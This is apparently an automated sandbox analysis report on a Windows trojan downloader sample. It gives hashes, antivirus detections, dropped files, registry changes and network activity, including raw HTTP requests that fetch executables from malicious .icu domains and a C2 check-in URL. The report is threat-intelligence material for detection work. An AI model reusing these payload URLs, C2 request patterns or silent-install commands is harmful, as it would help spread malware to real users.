paladin316

Exes_16624dd73e07cbb41a72d761834b8678_exe_2019-08-16_00_30.txt

Aug 15th, 2019
  1.  
  2. * MalFamily: "TrojanDownloader"
  3.  
  4. * MalScore: 7.6
  5.  
  6. * File Name: "Exes_16624dd73e07cbb41a72d761834b8678.exe"
  7. * File Size: 305152
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "3ac12a9b312148eb7fbdc866c7529b887a4f61b1dd4294b0c988bc0372c9d2e8"
  10. * MD5: "16624dd73e07cbb41a72d761834b8678"
  11. * SHA1: "fa7277590749ec603bda84b9321d660a04065dd4"
  12. * SHA512: "7640b0f9404524f09de16bf8cd958317e0420d6aecbbe24a332a3cd56246397f25bc277c00ac11f38a48c5d760119328893d2a837d05060fa0c0bee6520de9cf"
  13. * CRC32: "928EB661"
  14. * SSDEEP: "6144:4SHhkiv2ofUxewZDXW12f+DeI0Ir7eckoLftI4p:4SHhkixUPZDXW12fwekvFkAlI4p"
  15.  
  16. * Process Execution:
  17. "Exes_16624dd73e07cbb41a72d761834b8678.exe",
  18. "sghost.exe",
  19. "sghost.tmp",
  20. "trade-info.exe"
  21.  
  22.  
  23. * Executed Commands:
  24. "C:\\Users\\user\\AppData\\Local\\Temp\\sghost.exe /VERYSILENT /SP- /PASSWORD=346",
  25. "\"C:\\Users\\user\\AppData\\Local\\Temp\\is-18TLB.tmp\\sghost.tmp\" /SL5=\"$502E2,2434175,58368,C:\\Users\\user\\AppData\\Local\\Temp\\sghost.exe\" /VERYSILENT /SP- /PASSWORD=346"
  26.  
  27.  
  28. * Signatures Detected:
  29.  
  30. "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
  31. "Details":
  32.  
  33. "IP": "8.208.11.27:80"
  34.  
  35.  
  36.  
  37.  
  38. "Description": "Creates RWX memory",
  39. "Details":
  40.  
  41.  
  42. "Description": "Possible date expiration check, exits too soon after checking local time",
  43. "Details":
  44.  
  45. "process": "trade-info.exe, PID 2276"
  46.  
  47.  
  48.  
  49.  
  50. "Description": "Reads data out of its own binary image",
  51. "Details":
  52.  
  53. "self_read": "process: sghost.exe, pid: 1548, offset: 0x0025247f, length: 0x00010f2a"
  54.  
  55.  
  56. "self_read": "process: sghost.exe, pid: 1548, offset: 0x00263681, length: 0x0003b205"
  57.  
  58.  
  59. "self_read": "process: sghost.tmp, pid: 2252, offset: 0x00000000, length: 0x000afa00"
  60.  
  61.  
  62.  
  63.  
  64. "Description": "File has been identified by 10 Antiviruses on VirusTotal as malicious",
  65. "Details":
  66.  
  67. "Cylance": "Unsafe"
  68.  
  69.  
  70. "Symantec": "ML.Attribute.HighConfidence"
  71.  
  72.  
  73. "ESET-NOD32": "a variant of Win32/TrojanDownloader.Agent.ERR"
  74.  
  75.  
  76. "APEX": "Malicious"
  77.  
  78.  
  79. "Paloalto": "generic.ml"
  80.  
  81.  
  82. "FireEye": "Generic.mg.16624dd73e07cbb4"
  83.  
  84.  
  85. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  86.  
  87.  
  88. "Endgame": "malicious (moderate confidence)"
  89.  
  90.  
  91. "VBA32": "suspected of Trojan.Downloader.gen.h"
  92.  
  93.  
  94. "Rising": "Trojan.Generic@ML.97 (RDML:+Fg4sY95rKwMKUziWQAlIA)"
  95.  
  96.  
  97.  
  98.  
  99. "Description": "Drops a binary and executes it",
  100. "Details":
  101.  
  102. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\trade-info.exe"
  103.  
  104.  
  105. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\sghost.exe"
  106.  
  107.  
  108. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\is-18TLB.tmp\\sghost.tmp"
  109.  
  110.  
  111.  
  112.  
  113. "Description": "Performs some HTTP requests",
  114. "Details":
  115.  
  116. "url": "http://goodday3.icu/trading.exe"
  117.  
  118.  
  119. "url": "http://goodday3.icu/eghost.exe"
  120.  
  121.  
  122. "url": "http://goodday1.icu/gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2"
  123.  
  124.  
  125.  
  126.  
  127. "Description": "The binary likely contains encrypted or compressed data.",
  128. "Details":
  129.  
  130. "section": "name: .rsrc, entropy: 7.04, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00034c00, virtual_size: 0x00034af0"
  131.  
  132.  
  133.  
  134.  
  135.  
  136. * Started Service:
  137.  
  138. * Mutexes:
  139. "CicLoadWinStaWinSta0",
  140. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  141. "Local\\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511",
  142. "Local\\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000",
  143. "DefaultTabtip-MainUI"
  144.  
  145.  
  146. * Modified Files:
  147. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\trading1.exe",
  148. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PA320MG8\\eghost1.exe",
  149. "C:\\Users\\user\\AppData\\Local\\Temp\\is-18TLB.tmp\\sghost.tmp",
  150. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp\\_isetup\\_setup64.tmp",
  151. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp\\_isetup\\_iscrypt.dll",
  152. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\ReactiveUI.WPF.dll",
  153. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\System.Reactive.dll",
  154. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Trader.Domain.dll",
  155. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\DynamicData.dll",
  156. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\log4net.dll",
  157. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\MahApps.Metro.dll",
  158. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\MaterialDesignColors.dll",
  159. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\ReactiveUI.dll",
  160. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\StructureMap.dll",
  161. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\System.Windows.Interactivity.dll",
  162. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Trader.Client.exe",
  163. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\DynamicData.ReactiveUI.dll",
  164. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\MaterialDesignThemes.Wpf.dll",
  165. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Splat.dll",
  166. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Dragablz.dll",
  167. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\System.Drawing.Primitives.dll",
  168. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\unins000.dat",
  169. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-S3RL7.tmp",
  170. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\unins000.exe",
  171. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-ROFKP.tmp",
  172. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-JN55T.tmp",
  173. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\aaaaaaa.iss",
  174. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-51GRO.tmp",
  175. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-VIJA6.tmp",
  176. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-L3FOK.tmp",
  177. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-FFN00.tmp",
  178. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\l.txt",
  179. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-9B017.tmp",
  180. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Log4Net.config",
  181. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-TEDKJ.tmp",
  182. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-1RRNM.tmp",
  183. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-7MSIE.tmp",
  184. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-D8CGB.tmp",
  185. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-QJUV7.tmp",
  186. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-5JH7Q.tmp",
  187. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-TK29U.tmp",
  188. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-S3C8S.tmp",
  189. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-1BD8P.tmp",
  190. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-4A62L.tmp",
  191. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-GND79.tmp",
  192. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-55GEH.tmp",
  193. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-F0642.tmp",
  194. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Softsinn Trade-info.lnk"
  195.  
  196.  
  197. * Deleted Files:
  198. "C:\\Users\\user\\AppData\\Local\\Temp\\is-18TLB.tmp\\sghost.tmp",
  199. "C:\\Users\\user\\AppData\\Local\\Temp\\is-18TLB.tmp",
  200. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-S3RL7.tmp",
  201. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-ROFKP.tmp",
  202. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-JN55T.tmp",
  203. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-51GRO.tmp",
  204. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-VIJA6.tmp",
  205. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-L3FOK.tmp",
  206. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-FFN00.tmp",
  207. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-9B017.tmp",
  208. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-TEDKJ.tmp",
  209. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-1RRNM.tmp",
  210. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-7MSIE.tmp",
  211. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-D8CGB.tmp",
  212. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-QJUV7.tmp",
  213. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-5JH7Q.tmp",
  214. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-TK29U.tmp",
  215. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-S3C8S.tmp",
  216. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-1BD8P.tmp",
  217. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-4A62L.tmp",
  218. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-GND79.tmp",
  219. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Trader.Client.exe",
  220. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-55GEH.tmp",
  221. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-F0642.tmp",
  222. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Softsinn Trade-info.lnk",
  223. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Softsinn Trade-info.pif",
  224. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Softsinn Trade-info.url",
  225. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp\\_isetup\\_iscrypt.dll",
  226. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp\\_isetup\\_setup64.tmp",
  227. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp\\_isetup",
  228. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp"
  229.  
  230.  
  231. * Modified Registry Keys:
  232. "HKEY_CURRENT_USER\\Software\\softsinn\\",
  233. "HKEY_CURRENT_USER\\Software\\softsinn\\softsinn",
  234. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000",
  235. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Owner",
  236. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash",
  237. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Sequence",
  238. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFiles0000",
  239. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFilesHash",
  240. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1",
  241. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: Setup Version",
  242. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: App Path",
  243. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\InstallLocation",
  244. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: Icon Group",
  245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: User",
  246. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: Selected Tasks",
  247. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: Deselected Tasks",
  248. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: Language",
  249. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\DisplayName",
  250. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\UninstallString",
  251. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\QuietUninstallString",
  252. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\DisplayVersion",
  253. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Publisher",
  254. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\URLInfoAbout",
  255. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\HelpLink",
  256. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\URLUpdateInfo",
  257. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\NoModify",
  258. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\NoRepair",
  259. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\InstallDate",
  260. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\MajorVersion",
  261. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\MinorVersion",
  262. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\VersionMajor",
  263. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\VersionMinor",
  264. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\EstimatedSize"
  265.  
  266.  
  267. * Deleted Registry Keys:
  268. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFilesHash",
  269. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFiles0000",
  270. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Sequence",
  271. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash",
  272. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Owner"
  273.  
  274.  
  275. * DNS Communications:
  276.  
  277. "type": "A",
  278. "request": "goodday3.icu",
  279. "answers":
  280.  
  281. "data": "8.208.11.27",
  282. "type": "A"
  283.  
  284.  
  285.  
  286.  
  287. "type": "A",
  288. "request": "goodday1.icu",
  289. "answers":
  290.  
  291. "data": "8.208.11.27",
  292. "type": "A"
  293.  
  294.  
  295.  
  296.  
  297.  
  298. * Domains:
  299.  
  300. "ip": "8.208.11.27",
  301. "domain": "goodday3.icu"
  302.  
  303.  
  304. "ip": "8.208.11.27",
  305. "domain": "goodday1.icu"
  306.  
  307.  
  308.  
  309. * Network Communication - ICMP:
  310.  
  311. * Network Communication - HTTP:
  312.  
  313. "count": 1,
  314. "body": "",
  315. "uri": "http://goodday3.icu/trading.exe",
  316. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  317. "method": "GET",
  318. "host": "goodday3.icu",
  319. "version": "1.1",
  320. "path": "/trading.exe",
  321. "data": "GET /trading.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: goodday3.icu\r\nConnection: Keep-Alive\r\n\r\n",
  322. "port": 80
  323.  
  324.  
  325. "count": 1,
  326. "body": "",
  327. "uri": "http://goodday3.icu/eghost.exe",
  328. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  329. "method": "GET",
  330. "host": "goodday3.icu",
  331. "version": "1.1",
  332. "path": "/eghost.exe",
  333. "data": "GET /eghost.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: goodday3.icu\r\nConnection: Keep-Alive\r\n\r\n",
  334. "port": 80
  335.  
  336.  
  337. "count": 1,
  338. "body": "",
  339. "uri": "http://goodday1.icu/gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2",
  340. "user-agent": "Mylegion666",
  341. "method": "GET",
  342. "host": "goodday1.icu",
  343. "version": "1.1",
  344. "path": "/gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2",
  345. "data": "GET /gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2 HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Mylegion666\r\nHost: goodday1.icu\r\n\r\n",
  346. "port": 80
  347.  
  348.  
  349.  
  350. * Network Communication - SMTP:
  351.  
  352. * Network Communication - Hosts:
  353.  
  354. * Network Communication - IRC: